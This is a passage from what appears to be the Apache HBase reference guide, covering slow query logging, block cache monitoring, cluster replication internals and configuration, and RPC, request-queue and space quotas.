milliseconds that a query can be run without being logged.\n Defaults to 10000, or 10 seconds.\n Can be set to -1 to disable logging by time.\n* `hbase.ipc.warn.response.size` Maximum byte size of response that a query can return without being logged.\n Defaults to 100 megabytes.\n Can be set to -1 to disable logging by size.\n\n==== Metrics\n\nThe slow query log exposes to metrics to JMX.\n\n* `hadoop.regionserver_rpc_slowResponse` a global metric reflecting the durations of all responses that triggered logging.\n* `hadoop.regionserver_rpc_methodName.aboveOneSec` A metric reflecting the durations of all responses that lasted for more than one second.\n\n==== Output\n\nThe output is tagged with operation e.g. `(operationTooSlow)` if the call was a client operation, such as a Put, Get, or Delete, which we expose detailed fingerprint information for.\nIf not, it is tagged `(responseTooSlow)` and still produces parseable JSON output, but with less verbose information solely regarding its duration and size in the RPC itself. `TooLarge` is substituted for `TooSlow` if the response size triggered the logging, with `TooLarge` appearing even in the case that both size and duration triggered logging.\n\n==== Example\n\n\n[source]\n----\n2011-09-08 10:01:25,824 WARN org.apache.hadoop.ipc.HBaseServer: (operationTooSlow): {\"tables\":{\"riley2\":{\"puts\":[{\"totalColumns\":11,\"families\":{\"actions\":[{\"timestamp\":1315501284459,\"qualifier\":\"0\",\"vlen\":9667580},{\"timestamp\":1315501284459,\"qualifier\":\"1\",\"vlen\":10122412},{\"timestamp\":1315501284459,\"qualifier\":\"2\",\"vlen\":11104617},{\"timestamp\":1315501284459,\"qualifier\":\"3\",\"vlen\":13430635}]},\"row\":\"cfcd208495d565ef66e7dff9f98764da:0\"}],\"families\":[\"actions\"]}},\"processingtimems\":956,\"client\":\"10.47.34.63:33623\",\"starttimems\":1315501284456,\"queuetimems\":0,\"totalPuts\":1,\"class\":\"HRegionServer\",\"responsesize\":0,\"method\":\"multiPut\"}\n----\n\nNote that everything inside the \"tables\" structure is output produced by MultiPut's fingerprint, while the rest of the information is RPC-specific, such as processing time and client IP\/port.\nOther client operations follow the same pattern and the same general structure, with necessary differences due to the nature of the individual operations.\nIn the case that the call is not a client operation, that detailed fingerprint information will be completely absent.\n\nThis particular example, for example, would indicate that the likely cause of slowness is simply a very large (on the order of 100MB) multiput, as we can tell by the \"vlen,\" or value length, fields of each put in the multiPut.\n\n=== Block Cache Monitoring\n\nStarting with HBase 0.98, the HBase Web UI includes the ability to monitor and report on the performance of the block cache.\nTo view the block cache reports, click .\nFollowing are a few examples of the reporting capabilities.\n\n.Basic Info\nimage::bc_basic.png[]\n\n.Config\nimage::bc_config.png[]\n\n.Stats\nimage::bc_stats.png[]\n\n.L1 and L2\nimage::bc_l1.png[]\n\nThis is not an exhaustive list of all the screens and reports available.\nHave a look in the Web UI.\n\n== Cluster Replication\n\nNOTE: This information was previously available at\nlink:https:\/\/hbase.apache.org\/0.94\/replication.html[Cluster Replication].\n\nHBase provides a cluster replication mechanism which allows you to keep one cluster's state synchronized with that of another cluster, using the write-ahead log (WAL) of the source cluster to propagate the changes.\nSome use cases for cluster replication include:\n\n* Backup and disaster recovery\n* Data aggregation\n* Geographic data distribution\n* Online data ingestion combined with offline data analytics\n\nNOTE: Replication is enabled at the granularity of the column family.\nBefore enabling replication for a column family, create the table and all column families to be replicated, on the destination cluster.\n\n=== Replication Overview\n\nCluster replication uses a source-push methodology.\nAn HBase cluster can be a source (also called master or active, meaning that it is the originator of new data), a destination (also called slave or passive, meaning that it receives data via replication), or can fulfill both roles at once.\nReplication is asynchronous, and the goal of replication is eventual consistency.\nWhen the source receives an edit to a column family with replication enabled, that edit is propagated to all destination clusters using the WAL for that for that column family on the RegionServer managing the relevant region.\n\nWhen data is replicated from one cluster to another, the original source of the data is tracked via a cluster ID which is part of the metadata.\nIn HBase 0.96 and newer (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7709[HBASE-7709]), all clusters which have already consumed the data are also tracked.\nThis prevents replication loops.\n\nThe WALs for each region server must be kept in HDFS as long as they are needed to replicate data to any slave cluster.\nEach region server reads from the oldest log it needs to replicate and keeps track of its progress processing WALs inside ZooKeeper to simplify failure recovery.\nThe position marker which indicates a slave cluster's progress, as well as the queue of WALs to process, may be different for every slave cluster.\n\nThe clusters participating in replication can be of different sizes.\nThe master cluster relies on randomization to attempt to balance the stream of replication on the slave clusters.\nIt is expected that the slave cluster has storage capacity to hold the replicated data, as well as any data it is responsible for ingesting.\nIf a slave cluster does run out of room, or is inaccessible for other reasons, it throws an error and the master retains the WAL and retries the replication at intervals.\n\n.Consistency Across Replicated Clusters\n[WARNING]\n====\nHow your application builds on top of the HBase API matters when replication is in play. HBase's replication system provides at-least-once delivery of client edits for an enabled column family to each configured destination cluster. In the event of failure to reach a given destination, the replication system will retry sending edits in a way that might repeat a given message. Further more, there is not a guaranteed order of delivery for client edits. In the event of a RegionServer failing, recovery of the replication queue happens independent of recovery of the individual regions that server was previously handling. This means that it is possible for the not-yet-replicated edits to be serviced by a RegionServer that is currently slower to replicate than the one that handles edits from after the failure.\n\nThe combination of these two properties (at-least-once delivery and the lack of message ordering) means that some destination clusters may end up in a different state if your application makes use of operations that are not idempotent, e.g. Increments.\n====\n\n.Terminology Changes\n[NOTE]\n====\nPreviously, terms such as [firstterm]_master-master_, [firstterm]_master-slave_, and [firstterm]_cyclical_ were used to describe replication relationships in HBase.\nThese terms added confusion, and have been abandoned in favor of discussions about cluster topologies appropriate for different scenarios.\n====\n\n.Cluster Topologies\n* A central source cluster might propagate changes out to multiple destination clusters, for failover or due to geographic distribution.\n* A source cluster might push changes to a destination cluster, which might also push its own changes back to the original cluster.\n* Many different low-latency clusters might push changes to one centralized cluster for backup or resource-intensive data analytics jobs.\n The processed data might then be replicated back to the low-latency clusters.\n\nMultiple levels of replication may be chained together to suit your organization's needs.\nThe following diagram shows a hypothetical scenario.\nUse the arrows to follow the data paths.\n\n.Example of a Complex Cluster Replication Configuration\nimage::hbase_replication_diagram.jpg[]\n\nHBase replication borrows many concepts from the [firstterm]_statement-based replication_ design used by MySQL.\nInstead of SQL statements, entire WALEdits (consisting of multiple cell inserts coming from Put and Delete operations on the clients) are replicated in order to maintain atomicity.\n\n[[hbase.replication.management]]\n=== Managing and Configuring Cluster Replication\n.Cluster Configuration Overview\n\n. Configure and start the source and destination clusters.\n Create tables with the same names and column families on both the source and destination clusters, so that the destination cluster knows where to store data it will receive.\n. All hosts in the source and destination clusters should be reachable to each other.\n. If both clusters use the same ZooKeeper cluster, you must use a different `zookeeper.znode.parent`, because they cannot write in the same folder.\n. On the source cluster, in HBase Shell, add the destination cluster as a peer, using the `add_peer` command.\n. On the source cluster, in HBase Shell, enable the table replication, using the `enable_table_replication` command.\n. Check the logs to see if replication is taking place. If so, you will see messages like the following, coming from the ReplicationSource.\n----\nLOG.info(\"Replicating \"+clusterId + \" -> \" + peerClusterId);\n----\n\n.Cluster Management Commands\nadd_peer <ID> <CLUSTER_KEY>::\n Adds a replication relationship between two clusters. +\n * ID -- a unique string, which must not contain a hyphen.\n * CLUSTER_KEY: composed using the following template, with appropriate place-holders: `hbase.zookeeper.quorum:hbase.zookeeper.property.clientPort:zookeeper.znode.parent`\n * STATE(optional): ENABLED or DISABLED, default value is ENABLED\nlist_peers:: list all replication relationships known by this cluster\nenable_peer <ID>::\n Enable a previously-disabled replication relationship\ndisable_peer <ID>::\n Disable a replication relationship. HBase will no longer send edits to that\n peer cluster, but it still keeps track of all the new WALs that it will need\n to replicate if and when it is re-enabled. WALs are retained when enabling or disabling\n replication as long as peers exist.\nremove_peer <ID>::\n Disable and remove a replication relationship. HBase will no longer send edits to that peer cluster or keep track of WALs.\nenable_table_replication <TABLE_NAME>::\n Enable the table replication switch for all its column families. If the table is not found in the destination cluster then it will create one with the same name and column families.\ndisable_table_replication <TABLE_NAME>::\n Disable the table replication switch for all its column families.\n\n=== Verifying Replicated Data\n\nThe `VerifyReplication` MapReduce job, which is included in HBase, performs a systematic comparison of replicated data between two different clusters. Run the VerifyReplication job on the master cluster, supplying it with the peer ID and table name to use for validation. You can limit the verification further by specifying a time range or specific families. The job's short name is `verifyrep`. To run the job, use a command like the following:\n+\n[source,bash]\n----\n$ HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` \"${HADOOP_HOME}\/bin\/hadoop\" jar \"${HBASE_HOME}\/hbase-server-VERSION.jar\" verifyrep --starttime=<timestamp> --endtime=<timestamp> --families=<myFam> <ID> <tableName>\n----\n+\nThe `VerifyReplication` command prints out `GOODROWS` and `BADROWS` counters to indicate rows that did and did not replicate correctly.\n\n=== Detailed Information About Cluster Replication\n\n.Replication Architecture Overview\nimage::replication_overview.png[]\n\n==== Life of a WAL Edit\n\nA single WAL edit goes through several steps in order to be replicated to a slave cluster.\n\n. An HBase client uses a Put or Delete operation to manipulate data in HBase.\n. The region server writes the request to the WAL in a way allows it to be replayed if it is not written successfully.\n. If the changed cell corresponds to a column family that is scoped for replication, the edit is added to the queue for replication.\n. In a separate thread, the edit is read from the log, as part of a batch process.\n Only the KeyValues that are eligible for replication are kept.\n Replicable KeyValues are part of a column family whose schema is scoped GLOBAL, are not part of a catalog such as `hbase:meta`, did not originate from the target slave cluster, and have not already been consumed by the target slave cluster.\n. The edit is tagged with the master's UUID and added to a buffer.\n When the buffer is filled, or the reader reaches the end of the file, the buffer is sent to a random region server on the slave cluster.\n. The region server reads the edits sequentially and separates them into buffers, one buffer per table.\n After all edits are read, each buffer is flushed using link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], HBase's normal client.\n The master's UUID and the UUIDs of slaves which have already consumed the data are preserved in the edits they are applied, in order to prevent replication loops.\n. In the master, the offset for the WAL that is currently being replicated is registered in ZooKeeper.\n\n. The first three steps, where the edit is inserted, are identical.\n. Again in a separate thread, the region server reads, filters, and edits the log edits in the same way as above.\n The slave region server does not answer the RPC call.\n. The master sleeps and tries again a configurable number of times.\n. If the slave region server is still not available, the master selects a new subset of region server to replicate to, and tries again to send the buffer of edits.\n. Meanwhile, the WALs are rolled and stored in a queue in ZooKeeper.\n Logs that are [firstterm]_archived_ by their region server, by moving them from the region server's log directory to a central log directory, will update their paths in the in-memory queue of the replicating thread.\n. When the slave cluster is finally available, the buffer is applied in the same way as during normal processing.\n The master region server will then replicate the backlog of logs that accumulated during the outage.\n\n.Spreading Queue Failover Load\nWhen replication is active, a subset of region servers in the source cluster is responsible for shipping edits to the sink.\nThis responsibility must be failed over like all other region server functions should a process or node crash.\nThe following configuration settings are recommended for maintaining an even distribution of replication activity over the remaining live servers in the source cluster:\n\n* Set `replication.source.maxretriesmultiplier` to `300`.\n* Set `replication.source.sleepforretries` to `1` (1 second). This value, combined with the value of `replication.source.maxretriesmultiplier`, causes the retry cycle to last about 5 minutes.\n* Set `replication.sleep.before.failover` to `30000` (30 seconds) in the source cluster site configuration.\n\n[[cluster.replication.preserving.tags]]\n.Preserving Tags During Replication\nBy default, the codec used for replication between clusters strips tags, such as cell-level ACLs, from cells.\nTo prevent the tags from being stripped, you can use a different codec which does not strip them.\nConfigure `hbase.replication.rpc.codec` to use `org.apache.hadoop.hbase.codec.KeyValueCodecWithTags`, on both the source and sink RegionServers involved in the replication.\nThis option was introduced in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10322[HBASE-10322].\n\n==== Replication Internals\n\nReplication State in ZooKeeper::\n HBase replication maintains its state in ZooKeeper.\n By default, the state is contained in the base node _\/hbase\/replication_.\n This node contains two child nodes, the `Peers` znode and the `RS` znode.\n\nThe `Peers` Znode::\n The `peers` znode is stored in _\/hbase\/replication\/peers_ by default.\n It consists of a list of all peer replication clusters, along with the status of each of them.\n The value of each peer is its cluster key, which is provided in the HBase Shell.\n The cluster key contains a list of ZooKeeper nodes in the cluster's quorum, the client port for the ZooKeeper quorum, and the base znode for HBase in HDFS on that cluster.\n\nThe `RS` Znode::\n The `rs` znode contains a list of WAL logs which need to be replicated.\n This list is divided into a set of queues organized by region server and the peer cluster the region server is shipping the logs to.\n The rs znode has one child znode for each region server in the cluster.\n The child znode name is the region server's hostname, client port, and start code.\n This list includes both live and dead region servers.\n\n==== Choosing Region Servers to Replicate To\n\nWhen a master cluster region server initiates a replication source to a slave cluster, it first connects to the slave's ZooKeeper ensemble using the provided cluster key . It then scans the _rs\/_ directory to discover all the available sinks (region servers that are accepting incoming streams of edits to replicate) and randomly chooses a subset of them using a configured ratio which has a default value of 10%. For example, if a slave cluster has 150 machines, 15 will be chosen as potential recipient for edits that this master cluster region server sends.\nBecause this selection is performed by each master region server, the probability that all slave region servers are used is very high, and this method works for clusters of any size.\nFor example, a master cluster of 10 machines replicating to a slave cluster of 5 machines with a ratio of 10% causes the master cluster region servers to choose one machine each at random.\n\nA ZooKeeper watcher is placed on the _${zookeeper.znode.parent}\/rs_ node of the slave cluster by each of the master cluster's region servers.\nThis watch is used to monitor changes in the composition of the slave cluster.\nWhen nodes are removed from the slave cluster, or if nodes go down or come back up, the master cluster's region servers will respond by selecting a new pool of slave region servers to replicate to.\n\n==== Keeping Track of Logs\n\nEach master cluster region server has its own znode in the replication znodes hierarchy.\nIt contains one znode per peer cluster (if 5 slave clusters, 5 znodes are created), and each of these contain a queue of WALs to process.\nEach of these queues will track the WALs created by that region server, but they can differ in size.\nFor example, if one slave cluster becomes unavailable for some time, the WALs should not be deleted, so they need to stay in the queue while the others are processed.\nSee <<rs.failover.details,rs.failover.details>> for an example.\n\nWhen a source is instantiated, it contains the current WAL that the region server is writing to.\nDuring log rolling, the new file is added to the queue of each slave cluster's znode just before it is made available.\nThis ensures that all the sources are aware that a new log exists before the region server is able to append edits into it, but this operations is now more expensive.\nThe queue items are discarded when the replication thread cannot read more entries from a file (because it reached the end of the last block) and there are other files in the queue.\nThis means that if a source is up to date and replicates from the log that the region server writes to, reading up to the \"end\" of the current file will not delete the item in the queue.\n\nA log can be archived if it is no longer used or if the number of logs exceeds `hbase.regionserver.maxlogs` because the insertion rate is faster than regions are flushed.\nWhen a log is archived, the source threads are notified that the path for that log changed.\nIf a particular source has already finished with an archived log, it will just ignore the message.\nIf the log is in the queue, the path will be updated in memory.\nIf the log is currently being replicated, the change will be done atomically so that the reader doesn't attempt to open the file when has already been moved.\nBecause moving a file is a NameNode operation , if the reader is currently reading the log, it won't generate any exception.\n\n==== Reading, Filtering and Sending Edits\n\nBy default, a source attempts to read from a WAL and ship log entries to a sink as quickly as possible.\nSpeed is limited by the filtering of log entries Only KeyValues that are scoped GLOBAL and that do not belong to catalog tables will be retained.\nSpeed is also limited by total size of the list of edits to replicate per slave, which is limited to 64 MB by default.\nWith this configuration, a master cluster region server with three slaves would use at most 192 MB to store data to replicate.\nThis does not account for the data which was filtered but not garbage collected.\n\nOnce the maximum size of edits has been buffered or the reader reaches the end of the WAL, the source thread stops reading and chooses at random a sink to replicate to (from the list that was generated by keeping only a subset of slave region servers). It directly issues a RPC to the chosen region server and waits for the method to return.\nIf the RPC was successful, the source determines whether the current file has been emptied or it contains more data which needs to be read.\nIf the file has been emptied, the source deletes the znode in the queue.\nOtherwise, it registers the new offset in the log's znode.\nIf the RPC threw an exception, the source will retry 10 times before trying to find a different sink.\n\n==== Cleaning Logs\n\nIf replication is not enabled, the master's log-cleaning thread deletes old logs using a configured TTL.\nThis TTL-based method does not work well with replication, because archived logs which have exceeded their TTL may still be in a queue.\nThe default behavior is augmented so that if a log is past its TTL, the cleaning thread looks up every queue until it finds the log, while caching queues it has found.\nIf the log is not found in any queues, the log will be deleted.\nThe next time the cleaning process needs to look for a log, it starts by using its cached list.\n\nNOTE: WALs are saved when replication is enabled or disabled as long as peers exist.\n\n[[rs.failover.details]]\n==== Region Server Failover\n\nWhen no region servers are failing, keeping track of the logs in ZooKeeper adds no value.\nUnfortunately, region servers do fail, and since ZooKeeper is highly available, it is useful for managing the transfer of the queues in the event of a failure.\n\nEach of the master cluster region servers keeps a watcher on every other region server, in order to be notified when one dies (just as the master does). When a failure happens, they all race to create a znode called `lock` inside the dead region server's znode that contains its queues.\nThe region server that creates it successfully then transfers all the queues to its own znode, one at a time since ZooKeeper does not support renaming queues.\nAfter queues are all transferred, they are deleted from the old location.\nThe znodes that were recovered are renamed with the ID of the slave cluster appended with the name of the dead server.\n\nNext, the master cluster region server creates one new source thread per copied queue, and each of the source threads follows the read\/filter\/ship pattern.\nThe main difference is that those queues will never receive new data, since they do not belong to their new region server.\nWhen the reader hits the end of the last log, the queue's znode is deleted and the master cluster region server closes that replication source.\n\nGiven a master cluster with 3 region servers replicating to a single slave with id `2`, the following hierarchy represents what the znodes layout could be at some point in time.\nThe region servers' znodes all contain a `peers` znode which contains a single queue.\nThe znode names in the queues represent the actual file names on HDFS in the form `address,port.timestamp`.\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020, 123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n----\n\nAssume that 1.1.1.2 loses its ZooKeeper session.\nThe survivors will race to create a lock, and, arbitrarily, 1.1.1.3 wins.\nIt will then start transferring all the queues to its local peers znode by appending the name of the dead server.\nRight before 1.1.1.3 is able to clean up the old znodes, the layout will look like the following:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n lock\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020,123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n----\n\nSome time later, but before 1.1.1.3 is able to finish replicating the last WAL from 1.1.1.2, it dies too.\nSome new logs were also created in the normal queues.\nThe last region server will then try to lock 1.1.1.3's znode and will begin transferring all the queues.\nThe new layout will be:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1378 (Contains a position)\n\n 2-1.1.1.3,60020,123456630\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790-1.1.1.3,60020,123456630\/\n 1.1.1.2,60020.1312 (Contains a position)\n 1.1.1.3,60020,123456630\/\n lock\n 2\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1312 (Contains a position)\n----\n\n=== Replication Metrics\n\nThe following metrics are exposed at the global region server level and at the peer level:\n\n`source.sizeOfLogQueue`::\n number of WALs to process (excludes the one which is being processed) at the Replication source\n\n`source.shippedOps`::\n number of mutations shipped\n\n`source.logEditsRead`::\n number of mutations read from WALs at the replication source\n\n`source.ageOfLastShippedOp`::\n age of last batch that was shipped by the replication source\n\n`source.completedLogs`::\n The number of write-ahead-log files that have completed their acknowledged sending to the peer associated with this source. Increments to this metric are a part of normal operation of HBase replication.\n\n`source.completedRecoverQueues`::\n The number of recovery queues this source has completed sending to the associated peer. Increments to this metric are a part of normal recovery of HBase replication in the face of failed Region Servers.\n\n`source.uncleanlyClosedLogs`::\n The number of write-ahead-log files the replication system considered completed after reaching the end of readable entries in the face of an uncleanly closed file.\n\n`source.ignoredUncleanlyClosedLogContentsInBytes`::\n When a write-ahead-log file is not closed cleanly, there will likely be some entry that has been partially serialized. This metric contains the number of bytes of such entries the HBase replication system believes were remaining at the end of files skipped in the face of an uncleanly closed file. Those bytes should either be in different file or represent a client write that was not acknowledged.\n\n`source.restartedLogReading`::\n The number of times the HBase replication system detected that it failed to correctly parse a cleanly closed write-ahead-log file. In this circumstance, the system replays the entire log from the beginning, ensuring that no edits fail to be acknowledged by the associated peer. Increments to this metric indicate that the HBase replication system is having difficulty correctly handling failures in the underlying distributed storage system. No dataloss should occur, but you should check Region Server log files for details of the failures.\n\n`source.repeatedLogFileBytes`::\n When the HBase replication system determines that it needs to replay a given write-ahead-log file, this metric is incremented by the number of bytes the replication system believes had already been acknowledged by the associated peer prior to starting over.\n\n`source.closedLogsWithUnknownFileLength`::\n Incremented when the HBase replication system believes it is at the end of a write-ahead-log file but it can not determine the length of that file in the underlying distributed storage system. Could indicate dataloss since the replication system is unable to determine if the end of readable entries lines up with the expected end of the file. You should check Region Server log files for details of the failures.\n\n\n=== Replication Configuration Options\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| Option\n| Description\n| Default\n\n| zookeeper.znode.parent\n| The name of the base ZooKeeper znode used for HBase\n| \/hbase\n\n| zookeeper.znode.replication\n| The name of the base znode used for replication\n| replication\n\n| zookeeper.znode.replication.peers\n| The name of the peer znode\n| peers\n\n| zookeeper.znode.replication.peers.state\n| The name of peer-state znode\n| peer-state\n\n| zookeeper.znode.replication.rs\n| The name of the rs znode\n| rs\n\n| replication.sleep.before.failover\n| How many milliseconds a worker should sleep before attempting to replicate\n a dead region server's WAL queues.\n|\n\n| replication.executor.workers\n| The number of region servers a given region server should attempt to\n failover simultaneously.\n| 1\n|===\n\n=== Monitoring Replication Status\n\nYou can use the HBase Shell command `status 'replication'` to monitor the replication status on your cluster. The command has three variations:\n* `status 'replication'` -- prints the status of each source and its sinks, sorted by hostname.\n* `status 'replication', 'source'` -- prints the status for each replication source, sorted by hostname.\n* `status 'replication', 'sink'` -- prints the status for each replication sink, sorted by hostname.\n\n== Running Multiple Workloads On a Single Cluster\n\nHBase provides the following mechanisms for managing the performance of a cluster\nhandling multiple workloads:\n. <<quota>>\n. <<request_queues>>\n. <<multiple-typed-queues>>\n\n[[quota]]\n=== Quotas\nHBASE-11598 introduces RPC quotas, which allow you to throttle requests based on\nthe following limits:\n\n. <<request-quotas,The number or size of requests(read, write, or read+write) in a given timeframe>>\n. <<namespace_quotas,The number of tables allowed in a namespace>>\n\nThese limits can be enforced for a specified user, table, or namespace.\n\n.Enabling Quotas\n\nQuotas are disabled by default. To enable the feature, set the `hbase.quota.enabled`\nproperty to `true` in _hbase-site.xml_ file for all cluster nodes.\n\n.General Quota Syntax\n. THROTTLE_TYPE can be expressed as READ, WRITE, or the default type(read + write).\n. Timeframes can be expressed in the following units: `sec`, `min`, `hour`, `day`\n. Request sizes can be expressed in the following units: `B` (bytes), `K` (kilobytes),\n`M` (megabytes), `G` (gigabytes), `T` (terabytes), `P` (petabytes)\n. Numbers of requests are expressed as an integer followed by the string `req`\n. Limits relating to time are expressed as req\/time or size\/time. For instance `10req\/day`\nor `100P\/hour`.\n. Numbers of tables or regions are expressed as integers.\n\n[[request-quotas]]\n.Setting Request Quotas\nYou can set quota rules ahead of time, or you can change the throttle at runtime. The change\nwill propagate after the quota refresh period has expired. This expiration period\ndefaults to 5 minutes. To change it, modify the `hbase.quota.refresh.period` property\nin `hbase-site.xml`. This property is expressed in milliseconds and defaults to `300000`.\n\n----\n# Limit user u1 to 10 requests per second\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 read requests per second\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 M per day everywhere\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10M\/day'\n\n# Limit user u1 to 10 M write size per sec\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => WRITE, USER => 'u1', LIMIT => '10M\/sec'\n\n# Limit user u1 to 5k per minute on table t2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', TABLE => 't2', LIMIT => '5K\/min'\n\n# Limit user u1 to 10 read requests per sec on table t2\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', TABLE => 't2', LIMIT => '10req\/sec'\n\n# Remove an existing limit from user u1 on namespace ns2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', NAMESPACE => 'ns2', LIMIT => NONE\n\n# Limit all users to 10 requests per hour on namespace ns1\nhbase> set_quota TYPE => THROTTLE, NAMESPACE => 'ns1', LIMIT => '10req\/hour'\n\n# Limit all users to 10 T per hour on table t1\nhbase> set_quota TYPE => THROTTLE, TABLE => 't1', LIMIT => '10T\/hour'\n\n# Remove all existing limits from user u1\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => NONE\n\n# List all quotas for user u1 in namespace ns2\nhbase> list_quotas USER => 'u1, NAMESPACE => 'ns2'\n\n# List all quotas for namespace ns2\nhbase> list_quotas NAMESPACE => 'ns2'\n\n# List all quotas for table t1\nhbase> list_quotas TABLE => 't1'\n\n# list all quotas\nhbase> list_quotas\n----\n\nYou can also place a global limit and exclude a user or a table from the limit by applying the\n`GLOBAL_BYPASS` property.\n----\nhbase> set_quota NAMESPACE => 'ns1', LIMIT => '100req\/min' # a per-namespace request limit\nhbase> set_quota USER => 'u1', GLOBAL_BYPASS => true # user u1 is not affected by the limit\n----\n\n[[namespace_quotas]]\n.Setting Namespace Quotas\n\nYou can specify the maximum number of tables or regions allowed in a given namespace, either\nwhen you create the namespace or by altering an existing namespace, by setting the\n`hbase.namespace.quota.maxtables property` on the namespace.\n\n.Limiting Tables Per Namespace\n----\n# Create a namespace with a max of 5 tables\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxtables'=>'5'}\n\n# Alter an existing namespace to have a max of 8 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxtables'=>'8'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns2'\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=>'hbase.namespace.quota.maxtables'}\n----\n\n.Limiting Regions Per Namespace\n----\n# Create a namespace with a max of 10 regions\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxregions'=>'10'\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns1'\n\n# Alter an existing namespace to have a max of 20 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxregions'=>'20'}\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=> 'hbase.namespace.quota.maxregions'}\n----\n\n[[request_queues]]\n=== Request Queues\nIf no throttling policy is configured, when the RegionServer receives multiple requests,\nthey are now placed into a queue waiting for a free execution slot (HBASE-6721).\nThe simplest queue is a FIFO queue, where each request waits for all previous requests in the queue\nto finish before running. Fast or interactive queries can get stuck behind large requests.\n\nIf you are able to guess how long a request will take, you can reorder requests by\npushing the long requests to the end of the queue and allowing short requests to preempt\nthem. Eventually, you must still execute the large requests and prioritize the new\nrequests behind them. The short requests will be newer, so the result is not terrible,\nbut still suboptimal compared to a mechanism which allows large requests to be split\ninto multiple smaller ones.\n\nHBASE-10993 introduces such a system for deprioritizing long-running scanners. There\nare two types of queues, `fifo` and `deadline`. To configure the type of queue used,\nconfigure the `hbase.ipc.server.callqueue.type` property in `hbase-site.xml`. There\nis no way to estimate how long each request may take, so de-prioritization only affects\nscans, and is based on the number of \u201cnext\u201d calls a scan request has made. An assumption\nis made that when you are doing a full table scan, your job is not likely to be interactive,\nso if there are concurrent requests, you can delay long-running scans up to a limit tunable by\nsetting the `hbase.ipc.server.queue.max.call.delay` property. The slope of the delay is calculated\nby a simple square root of `(numNextCall * weight)` where the weight is\nconfigurable by setting the `hbase.ipc.server.scan.vtime.weight` property.\n\n[[multiple-typed-queues]]\n=== Multiple-Typed Queues\n\nYou can also prioritize or deprioritize different kinds of requests by configuring\na specified number of dedicated handlers and queues. You can segregate the scan requests\nin a single queue with a single handler, and all the other available queues can service\nshort `Get` requests.\n\nYou can adjust the IPC queues and handlers based on the type of workload, using static\ntuning options. This approach is an interim first step that will eventually allow\nyou to change the settings at runtime, and to dynamically adjust values based on the load.\n\n.Multiple Queues\n\nTo avoid contention and separate different kinds of requests, configure the\n`hbase.ipc.server.callqueue.handler.factor` property, which allows you to increase the number of\nqueues and control how many handlers can share the same queue., allows admins to increase the number\nof queues and decide how many handlers share the same queue.\n\nUsing more queues reduces contention when adding a task to a queue or selecting it\nfrom a queue. You can even configure one queue per handler. The trade-off is that\nif some queues contain long-running tasks, a handler may need to wait to execute from that queue\nrather than stealing from another queue which has waiting tasks.\n\n.Read and Write Queues\nWith multiple queues, you can now divide read and write requests, giving more priority\n(more queues) to one or the other type. Use the `hbase.ipc.server.callqueue.read.ratio`\nproperty to choose to serve more reads or more writes.\n\n.Get and Scan Queues\nSimilar to the read\/write split, you can split gets and scans by tuning the `hbase.ipc.server.callqueue.scan.ratio`\nproperty to give more priority to gets or to scans. A scan ratio of `0.1` will give\nmore queue\/handlers to the incoming gets, which means that more gets can be processed\nat the same time and that fewer scans can be executed at the same time. A value of\n`0.9` will give more queue\/handlers to scans, so the number of scans executed will\nincrease and the number of gets will decrease.\n\n[[space-quotas]]\n=== Space Quotas\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-16961[HBASE-16961] introduces a new type of\nquotas for HBase to leverage: filesystem quotas. These \"space\" quotas limit the amount of space\non the filesystem that HBase namespaces and tables can consume. If a user, malicious or ignorant,\nhas the ability to write data into HBase, with enough time, that user can effectively crash HBase\n(or worse HDFS) by consuming all available space. When there is no filesystem space available,\nHBase crashes because it can no longer create\/sync data to the write-ahead log.\n\nThis feature allows a for a limit to be set on the size of a table or namespace. When a space quota is set\non a namespace, the quota's limit applies to the sum of usage of all tables in that namespace.\nWhen a table with a quota exists in a 